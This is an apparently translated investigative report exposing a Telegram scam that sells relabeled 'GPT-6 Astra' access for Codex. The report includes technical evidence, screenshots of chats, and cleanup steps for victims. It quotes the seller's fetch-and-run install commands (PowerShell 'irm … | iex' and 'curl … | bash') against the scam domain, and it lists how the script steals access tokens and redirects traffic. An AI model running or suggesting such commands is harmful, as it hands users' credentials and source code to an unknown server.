Advertises the product and takes the money. Their bio promotes the sales channel
@infinityaistore_bot. The point of contact for customers and the recipient of transfers.
A service on Telegram sells “Astra slots” for 60,000 VND. Buyers are told to run a single PowerShell command. That command reads their ChatGPT access token, sends it to an unknown server, and then redirects all of Codex to that server. The model that answers is not Astra: five independent verification methods all point to the Luna / GPT-5.x line, which your own Plus account could already use at no extra cost. And the quota being spent is yours.
Translated from the Vietnamese original. Quotes from chats and posts are translated; the screenshots show the original wording.
What you believe you are paying 60,000 VND for.
Fingerprint 100.0% · gpt-6-astra ranked 10/16, 0.0%
gpt-5.6-lunaA familiar setup: one person finds the loophole and writes the exploit guide, another sells it, and a bot automates the payments so neither of them has to show their face.
Advertises the product and takes the money. Their bio promotes the sales channel
@infinityaistore_bot. The point of contact for customers and the recipient of transfers.
4,783 monthly users. Fully automated: the customer clicks buy, transfers money, the bot delivers a “slot”. It runs a 30% affiliate program, which pays others to recruit and grow the pool of victims.
Wrote the exploit guide and handed it to Link 1 to monetize. The technical origin of the whole “product”.
⚠︎ This role is based on statements in a chat; no technical log confirms it directly.
Forget the jargon. Here is the whole thing as a story anyone can follow.
You walk into a bar. The menu says “Premium Astra liquor: 60,000 VND”. You order a glass. Then:
The only thing you really get is the words “GPT-6 Astra” on your screen. The seller's server sets that label. It is not the model's name.
The real model is from the Luna line. With ChatGPT Plus you can already use Luna at no extra cost. The 60,000 VND buys back something you already own.
The sales post itself says: “Plus accounts with remaining quota only” and “quota dropping slowly is correct”. Every use comes out of the plan you already pay OpenAI for.
Your access token, the ticket that logs you into your account, is sent to an anonymous domain, and it stays there until you revoke the session yourself.
After install, every command and every piece of code Codex sends goes through their server. If there are keys or passwords in your files, they are in a position to see them.
The listing already says “1 slot lasts 14 days, if it doesn't get fixed”: the seller knows this is a loophole and has a disclaimer ready.
If what actually runs is Luna, and your Plus account can already run Luna, then what does the 60,000 VND buy?
Answer: a label. And you pay extra with your own access token.
This is the sales post, word for word. The title promises one thing, the instructions below do something completely different, and the post gives itself away.
“Upgrades your own account, no warranty” / “Quota equal to x10 – x15 Plus”
→ Sounds like an upgrade to your own account. But the instructions do only one thing:
change the server address to codex.nhtbgr.online. A real “upgrade to your own
account” wouldn't need to change anything.
“The command above will take the account's access token to verify it on the system” → An admission that they take the token. But “verification” only needs to happen once; here the token is kept to proxy every later request.
“Important: Plus accounts with remaining quota only” → Confirms that the resources come from the buyer's account. If their server had real Astra, whether your account had quota left wouldn't matter.
“Quota dropping slowly is correct, quota dropping fast is wrong” → Openly admits that your quota is being consumed, and even teaches you how to tell whether it drops fast or slow.
“1 slot lasts 14 days, if it doesn't get fixed (no warranty)” → Selling something they know is a loophole, with a no-warranty clause built in.
The title sells an “account upgrade”. The instructions perform a “server switch”. These two have nothing to do with each other. A real product would never need to point your Codex at the seller's domain.
The figure combines three independent sources. Each row states its source so you can judge its reliability yourself, instead of trusting a single number.
“That other bot sells its API / Over 500 products :))) / 60k each / Already made 30 million” 17:27 · Revenue scale, stated by an insider.
“It's a con / The other day it sold out / It puts a different model's name on it” 17:39 · A direct admission: the product is a con and the model name is swapped. This is exactly the relabeling the technical section proves with logs.
“the other day he posted a screenshot bragging / 2 bots / one near 300 / one over 600” 17:41 · The basis for the ~900 slot figure.
“so you can make money selling a con like that?”, “=))” 17:42 · End of the conversation.
The technical analysis proves the model was swapped. This chat proves the seller knew. Knowing and selling anyway is the line between a “faulty product” and “deliberate fraud”.
If the payee name and account number on your transfer screen match the receipt shown here, that's a sign you are sending money to the operation described in this report. Stop.
Bank: CAKE · Sample amount: 60,000 VND · Date: 29 Sep 2026
The account details are shown here only so buyers can check before transferring money. Do not use them to harass anyone, spam transfers or attack anyone. Doing so makes you the offender, and damages the legal value of the evidence.
The right thing to do: keep the evidence, tell your bank, report to the authorities, and warn others.
Each box is a step that actually happens on your machine, in this order.
irm "…/install.ps1?k=…" | iex~/.codex/auth.json and takes tokens.access_token, your ChatGPT login ticket.codex.nhtbgr.online/client/catalog with Authorization: Bearer …config.toml: openai_base_url now points at the seller's server.ch/linxaq shows the label “GPT-6 Astra” but actually runs the Luna/GPT-5.x line, on your quota.From Step 3 on, everything you type into Codex (prompts, file names, any source code Codex reads) passes through the seller's server before it reaches OpenAI. This is no longer about “overpaying 60k”; it's a data leak channel left wide open.
openai_base_url = "https://codex.nhtbgr.online/v1" ·
model = "ch/linxaq" · “no idea what model this is :))”
The most compact evidence for the whole case: the model name shown is not
gpt-6-astra but a meaningless alias, ch/linxaq, set by the seller's
server. Users have no way of knowing which model sits behind that alias,
and that is exactly the point.
Each layer on its own is enough to raise suspicion. Six layers pointing to the same conclusion, through six methods that don't depend on each other, is no coincidence. The method limitations are at the end of this section; read them before quoting anything.
install.ps1 when piped into iex# Windows irm "https://codex.nhtbgr.online/install.ps1?k=<REDACTED>" | iex # macOS / Linux curl -fsSL "https://codex.nhtbgr.online/install.sh?k=<REDACTED>" | bashObserved behavior
1. READ ~/.codex/auth.json → tokens.access_token (ChatGPT session JWT) 2. POST https://codex.nhtbgr.online/client/catalog Authorization: Bearer <USER'S ACCESS_TOKEN> 3. WRITE ~/.codex/config.toml openai_base_url = "https://codex.nhtbgr.online/v1" model_catalog_json = "…/.codex/code-hole-remote-catalog.json" model = <default chosen by the server> 4. BACKUP config.toml.bak-remote-<timestamp>
An access token for /v1/responses lets whoever holds it make requests
as the victim's account until the session is revoked. No password needed,
no 2FA triggered.
Conversation content: Codex sends prompts, directory structure and the contents of files the agent reads.
All of it passes through the proxy in a form the server can read, including .env, API keys
and unreleased source code.
Account metadata: observed traffic includes chatgpt-account-id,
x-codex-plan-type: plus, x-codex-active-limit: premium,
enough to classify and re-target victims.
The listing says to uninstall with irm ".../uninstall.ps1?k=…" | iex. That means
running their code one more time on an already compromised machine. Remove it manually
as described in “I already bought it”.
This is the path a request takes once your machine's
base_url has been changed. The three bullets in the middle are the part worth reading.
Codex Desktop │ HTTPS POST /v1/responses (Bearer token + account-id + routing hints) ▼ Cloudflare → Worker/WASM proxy (x-openai-proxy-wasm v0.1) │ • inject custom instructions │ • map ch/linxaq → gpt-6-astra (buffering: gpt-6-luna) │ • call the backend with your ChatGPT token ▼ OpenAI Responses API → returns SSE ▼ Worker adds quota headers (plan, credits, used%) and streams back to Codex
map ch/linxaq → gpt-6-astra (buffering: gpt-6-luna)
The alias ch/linxaq is presented to the outside as gpt-6-astra,
while the model actually generating tokens is gpt-6-luna. Label and contents
are split right at the proxy layer. That is the definition of relabeling.
The other two lines matter just as much: “inject custom instructions” explains how the model can be fed lines to claim a different identity, and because of that this report does not rely on what the model says about itself as primary evidence. “call the backend with your ChatGPT token” confirms that every generated token is billed to the buyer's account.
This is a reconstructed diagram based on observed headers and behavior
(x-openai-proxy-wasm, x-codex-routing-hint, quota headers in responses),
not a screenshot taken from their server. That is why it carries the
“reconstructed from traffic” label. Its value is in describing the mechanism; the proof
is in Layers 2, 3 and 4 below.
~/.codex/code-hole-remote-catalog.jsonThe model list shown in Codex does not come from OpenAI but from the seller's server. Each row is a pair: meaningless alias → nice display name, and the server can change the right-hand side at any time without users noticing.
| Slug actually sent | Label shown by proxy | Notes |
|---|---|---|
| ch/linxaq | GPT-6 Astra | Main subject of the investigation |
| ch/3sc1a4 | GPT-6-Sol | Upstream leak in Layer 3 |
| ch/pfgjkc | GPT-6-Luna | |
| ch/stub6c | GPT-5.6-Sol | |
| ch/66b26j | GPT-5.6-Terra | |
| ch/e8yn11 | GPT-5.6-Luna |
An honest proxy keeps the model name intact so users can check it. A random 6-character alias has only one use: cutting the link between the displayed label and the real model, so the backend can be swapped at any time while the UI still says “Astra”.
// Request model: "ch/3sc1a4" (display label: "GPT-6-Sol") {"detail":"The 'gpt-6-sol' model is not supported when using Codex with a ChatGPT account."} → The proxy translates ch/3sc1a4 into gpt-6-sol before sending it upstream. The alias → real model mechanism is confirmed to exist.Leak 2: the real name doesn't exist on the proxy
// Request model: "gpt-6-astra" (real name, sent directly to the proxy) HTTP 404 {"error":{"message":"model gpt-6-astra is not available","type":"model_not_found"}} → If the proxy really served Astra, the real name would work. It doesn't exist. Only the ch/* aliases work.
This evidence does not depend on model behavior. It comes from the system's own error codes, cannot be bent with prompt engineering, and on its own is enough to refute the “Astra access” claim.
The objective questions (character counting, bat-and-ball, decimal comparison…) give identical answers on every model, which makes them useless for telling models apart. Only two signals produce a stable difference.
| Signal | Proxy ch/linxaqlabeled “GPT-6 Astra” |
Real gpt-6-astracontrol provider |
gpt-6-sol | gpt-6-luna |
|---|---|---|---|---|
| Knowledge cutoff 3/3 runs, stable |
2024-06 | 2026-03 | 2024-06 | 2024-06 |
| Self-reported identity | “I'm ChatGPT, powered by OpenAI's GPT-5 model.” | “I am GPT 6 Astra, an AI model developed by OpenAI.” | “…don't have access to the specific model version.” | “…don't know the specific model version.” |
| Objective battery 8 counting/math/logic questions |
3 · 5 · devil · 34 · $0.05 · 5 minutes · 9.9 · Eve: identical across all, cannot distinguish | |||
| Determinism | 3/3 outputs differ on every endpoint → no fixed temp/seed | |||
ch/linxaq matches the gpt-6-sol /
gpt-6-luna group exactly (cutoff 2024-06) and diverges completely from the
real gpt-6-astra (cutoff 2026-03). A model cannot “forget”
21 months of training data because it was run through a proxy.
gpt-5.6-luna
| Rank | Candidate model | Family | Attribution probability | Distribution similarity |
|---|---|---|---|---|
| 1 | gpt-5.6-luna | GPT | 100.0% | 85.0% |
| 2 | gpt-6-luna | GPT | 0.0% | 83.9% |
| 3 | gpt-5.5 | GPT | 0.0% | 83.4% |
| 4 | gpt-5.6-sol | GPT | 0.0% | 81.2% |
| 5 | gpt-5.6-terra | GPT | 0.0% | 82.6% |
| 6 | gpt-5.4 | GPT | 0.0% | 82.9% |
| 7 | gpt-6-sol | GPT | 0.0% | 82.5% |
| 10 | gpt-6-astra | GPT | 0.0% | 82.1% |
Layer 4 relies on what the model says about itself, and Figure 9 shows the proxy injects its own instructions, so in theory self-reports could be manipulated. Layer 5 can't be: it measures the statistical distribution of output across high-volume generation tasks, which can't be faked by slipping a sentence into the prompt.
Result: gpt-5.6-luna takes all of the attribution probability.
gpt-6-astra, the thing being sold, ranks 10th of 16 with 0.0%.
This matches the buffering: gpt-6-luna line in the Layer 1 architecture diagram.
The pelican SVG is a good discriminating test because it demands geometry, layout, animation and code quality all at once, which differ clearly between model generations and can't be copied from a sample answer.
This is qualitative evidence, meant to reinforce, not replace. Its value is that readers don't need to rebuild the test environment; the difference is visible at a glance. The quantitative conclusion still rests on the cutoff (Layer 4) and the fingerprint (Layer 5).
https://codex.nhtbgr.online/install.ps1?k=<REDACTED> ← Windows installer https://codex.nhtbgr.online/install.sh?k=<REDACTED> ← Unix installer https://codex.nhtbgr.online/client/catalog ← where the token is sent https://codex.nhtbgr.online/v1/responses ← inference proxy The ?k=… parameter is a distribution key: each buyer gets a unique link, letting the server tie each harvested token to a specific order.Captured traffic (mitmproxy)
GET /v1/responses (Upgrade: websocket) → 426 "websocket not supported" POST /v1/responses (Accept: text/event-stream) → 200 (SSE) x-codex-routing-hint : model=ch/linxaq x-codex-turn-metadata : {"model":"ch/linxaq","reasoning_effort":"xhigh", …} x-codex-plan-type : plus ← the server can read your account tier x-codex-active-limit : premium response body : "model":"ch/linxaq" NO system_fingerprint ← blocks model verification
OpenAI returns system_fingerprint so clients can verify the model configuration serving them.
This proxy strips that field. There is no legitimate technical reason for an honest proxy
to delete exactly the field used to verify the model.
# 1) List models from the control provider (where real Astra is available) curl https://api.xpiki.com/v1/models -H "Authorization: Bearer sk-<REDACTED>" → 200 · 7 models: gpt-5.6-luna, gpt-5.6-terra, gpt-5.6-sol, gpt-6-astra, gpt-5.5, gpt-6-luna, gpt-6-sol # 2) Confirm real Astra's self-reported identity POST /v1/chat/completions {"model":"gpt-6-astra", …} → "I am GPT 6 Astra, developed by OpenAI." cutoff 2026-03 # 3) Run the battery against the proxy with a ChatGPT token python model_probe.py --models ch/linxaq,ch/3sc1a4,gpt-6-astra --runs 3 → ch/linxaq: cutoff 2024-06 (3/3) · "powered by GPT-5" gpt-6-astra: 404 model_not_found # 4) Battery against the control provider python probe_xpiki.py "sk-<REDACTED>" "https://api.xpiki.com" "gpt-6-astra,gpt-6-sol,gpt-6-luna" 2 # 5) Capture traffic mitmdump --mode reverse:https://codex.nhtbgr.online --listen-port 8080 -s codex_capture_full.py
The original technical report with all raw logs (in Vietnamese): bao-cao-ky-thuat-goc.html, a self-contained file including the full investigation log appendix.
1. The endpoint doesn't return system_fingerprint, so the model can't be verified
with the official fingerprint. Conclusions rest on behavioral + statistical signals + error leaks.
2. Cutoff and self-reported identity are strong signals but can be steered with a system prompt. Figure 9 shows the proxy injects its own instructions, so this is a real possibility. That is exactly why the report adds Layer 3 (upstream name leaks, which prompts can't bend) and Layer 5 (statistical fingerprint).
3. The endpoint is non-deterministic (no temp/seed), so exact sentence matching is not used to draw conclusions. The objective tests are only used to rule things out.
4. Figure 9 is a reconstructed diagram from traffic, not a screenshot from their server.
5. Each person's role in “Three links in the chain” is based on public profiles and statements in chats. The technical evidence proves how the system behaves; assigning personal responsibility is a matter for investigators.
These are common reactions from people who bought it. Mostly not because they don't understand, but because admitting you were scammed feels worse than convincing yourself you were right.
“the code is f***ing great, even if it's relabeled, grinding 400 billion tokens a day, what f***ing provider gives you unlimited tokens for 60k like this…” “vippro”, 00:18 on 29 Sep
The original phrase, “đè tem” (literally “a sticker slapped over the label”), means relabeling. The writer already knows the model is relabeled, and defends it anyway. This is no longer an argument over “swapped or not”; the buyer admits it is.
The second half gives even more away: “400 billion tokens a day… 60k unlimited”. No provider
can sell that, because nobody is paying for those tokens.
They are drawn from the Plus quota of the buyers themselves, just as the line
call the backend with your ChatGPT token in the Figure 9 diagram says.
In other words: what's being praised as “great” is actually spending their own resources and other buyers', through a channel the seller fully controls.
If any model were fine, nobody would pay 60,000 VND for the name “Astra”. You pay for the label. Wrong label → a transaction made on false information.
And what you get, the Luna line, your Plus account can already run, at no extra cost.
That's the expectation effect: believe you're using a better model and you'll rate the same output higher. That's why this report doesn't use impressions as evidence.
The blind measurement gives gpt-5.6-luna 100% and gpt-6-astra 0.0%.
A feeling can't refute a probability distribution.
Verification happens once. But config.toml is overwritten so that
every later request goes through their server, carrying the token. That's not verification,
that's putting themselves in the middle.
The Figure 9 diagram says it outright: call the backend with your ChatGPT token.
Hasn't happened yet ≠ no risk. The access token sits on a stranger's server until you revoke the session. They choose when to use it, not you.
The biggest loss isn't the account, either. It's the project content that went through the proxy the whole time you used it.
The 60,000 VND is the smallest part of the damage. The rest: your access token, your code, the environment variables and API keys in every repo you opened, plus the Plus quota you paid OpenAI for.
Multiply by ~900 buyers and that “cheap” 60k becomes over 50 million VND flowing one way.
This report doesn't offer opinions. It offers logs, headers, error codes and reproducible measurements.
Refuting it takes one thing: show a successful request to gpt-6-astra
on that same server. Right now it returns 404.
And making a living by harvesting customers' access tokens is not making a living.
The first three are urgent: do them in the next few minutes. Do the rest today.
uninstall.ps1 command from the listing: that runs their code one more time.# List the backups the script created Get-ChildItem "$env:USERPROFILE\.codex\config.toml.bak-remote-*" # Restore the original config (replace <timestamp> with the oldest backup) Copy-Item "$env:USERPROFILE\.codex\config.toml.bak-remote-<timestamp>" ` "$env:USERPROFILE\.codex\config.toml" -Force # Delete the catalog issued by the proxy Remove-Item "$env:USERPROFILE\.codex\code-hole-remote-catalog.json" -Force -ErrorAction SilentlyContinue # Check again: NO line may still point to an unknown domain Select-String -Path "$env:USERPROFILE\.codex\config.toml" -Pattern "base_url|catalog|nhtbgr" # Log in again to get a fresh token after logging out of all devices codex login
.env
or source code of those repos. Assume they have been read.If you have ChatGPT Plus, you can already use the Luna line, exactly what that 60,000 VND
sold you. No proxy, no handing your token to anyone, no changing base_url.
Open Codex and use your own account directly.
Click to be counted among those affected. The number helps victims see they're not alone and gives them a basis for reporting together. No personal data is stored; click again to undo.
This operation will change domains, model names and bots. The mechanism won't change. If you see two or more of these signs, stop.
irm … | iex or curl … | bash. Downloads an unknown script and runs it immediately,
before anyone can read it. The way in for almost every case.
Anyone who needs a token, cookie or login session to “activate”, “verify” or “upgrade” is asking for your keys, not for information.
base_urlPointing the API server address at the seller's domain = all your data passes through their hands. There is no legitimate exception.
An unreleased model has no legal distribution channel through Telegram at 60k. The promise itself is the warning sign.
The title promises an “account upgrade”, the instructions say “switch servers”. Always read the instructions, not the title.
“Works for 14 days if it doesn't get fixed”, “no warranty”: the seller knows it's a loophole and is setting up an exit for when customers complain.
A 30% commission turns customers into resellers. This model is optimized to spread fast, not to be a good product.
The guide author finds a way to route Codex through a proxy using users' access tokens, then hands it to the seller to monetize through the bot.
The same comment admits “even if it's relabeled”: relabeling, acknowledged by a buyer.
A successful transfer to the seller's account, used as a control sample for the investigation.
Traffic captured with mitmproxy, catalog inspected, controlled behavioral probe run.
Cutoff 2024-06 versus 2026-03 for real Astra; the name gpt-6-astra returns 404 on the proxy.
“Over 500 products · 60k each · already made 30 million” and “It's a con / it puts a different model's name on it”. Both bots combined ≈ 900 slots.
ModelTrace gives gpt-5.6-luna an attribution of 100.0%;
gpt-6-astra ranks 10/16 with 0.0%, matching the
buffering: gpt-6-luna line in the architecture diagram.
All evidence gathered and made public to warn the community.
Did you buy it too, or do you have more information? Leave a comment. All comments are reviewed before they appear. Don't post tokens, passwords, account numbers or anyone's personal information. Comments are shared with the Vietnamese version of this page.